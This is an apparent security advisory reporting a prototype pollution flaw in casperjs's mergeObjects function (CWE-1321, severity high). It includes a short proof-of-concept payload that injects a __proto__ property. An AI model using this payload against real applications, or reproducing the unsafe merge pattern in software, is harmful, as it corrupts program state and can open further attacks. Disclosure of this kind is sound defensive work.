casperjs is a navigation scripting & testing utility for PhantomJS and SlimerJS.
Affected versions of this package are vulnerable to Prototype Pollution via the mergeObjects utility function.
var payload = JSON.parse('{"__proto__": {"a": "pwned"}}');
mergeObjects({}, payload);
console.log({}.a); // prints "pwned"
{
"github_reviewed": true,
"cwe_ids": [
"CWE-1321",
"CWE-915"
],
"github_reviewed_at": "2021-05-11T22:26:54Z",
"nvd_published_at": "2020-06-19T11:15:00Z",
"severity": "HIGH"
}